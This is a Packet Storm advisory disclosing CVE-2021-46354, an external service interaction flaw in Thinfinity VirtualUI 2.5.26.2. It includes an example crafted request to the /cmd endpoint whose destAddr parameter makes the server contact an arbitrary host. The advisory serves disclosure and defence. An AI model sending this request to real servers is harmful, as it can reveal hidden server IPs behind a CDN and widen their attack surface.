what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Thinfinity VirtualUI 2.5.26.2 Information Disclosure

Thinfinity VirtualUI 2.5.26.2 Information Disclosure
Posted Feb 21, 2022
Authored by Daniel Morales

Thinfinity VirtualUI version 2.5.26.2 suffers from an information disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2021-46354
SHA-256 | 2b19df6335cfc9aa814e3c77fff5405550b9e652464edcbb2f4a2198d44c4ca2

Thinfinity VirtualUI 2.5.26.2 Information Disclosure

Change Mirror Download
Exploit Title: Thinfinity VirtualUI  2.5.26.2 - Information Disclosure
Date: 18/01/2022
Exploit Author: Daniel Morales
Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/>
Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/>
Version vulnerable: Thinfinity VirtualUI < v2.5.26.2
Tested on: Microsoft Windows
CVE: CVE-2021-46354

How it works
External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN).

Payload
An example of the HTTP request "https://example.com/cmd <https://example.com/cmd>?
cmd=connect&wscompression=true&destAddr=domain.com <http://domain.com/>
&scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=191
8&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supp
ortsFullScreen=true&webapp=false”

Where "domain.com <http://domain.com/>" is the external endpoint to be requested.

Vulnerable versions
It has been tested in VirtualUI version 2.1.28.0, 2.1.32.1 and 2.5.26.2

References
https://github.com/cybelesoft/virtualui/issues/3 <https://github.com/cybelesoft/virtualui/issues/3>
https://www.tenable.com/cve/CVE-2021-46354 <https://www.tenable.com/cve/CVE-2021-46354>
https://twitter.com/danielmofer <https://twitter.com/danielmofer>

Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close